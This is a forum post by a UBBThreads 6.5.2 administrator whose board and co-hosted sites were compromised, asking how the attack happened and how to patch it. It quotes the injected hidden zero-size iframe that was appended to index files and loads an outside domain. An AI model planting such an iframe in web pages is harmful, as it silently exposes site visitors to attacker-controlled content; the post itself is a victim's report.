Last night my board (running 6.5.2) got hacked and I can't figure out how.
At the end of all index.php, index.html files and ubbthreads.php there were the following two lines added:

<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

Some users complained about popups and slow pages and that is how I found out that my board is compromised.

Actually, since I run many other virtual servers on the same server, all their index files were modified as well. So I think this guy have spent lots of time to find them (I have about 80 gigs of data in zillion files). The modified time was identical on all compromised files.

Did anyone have similar issue? I googled it and it appears that other ubbthreads boards were target of this attack as well.

My board is under heavy traffic and it is near to impossible to analyze the webserver logs.

Any idea how to patch ubbthreads agains such attacks?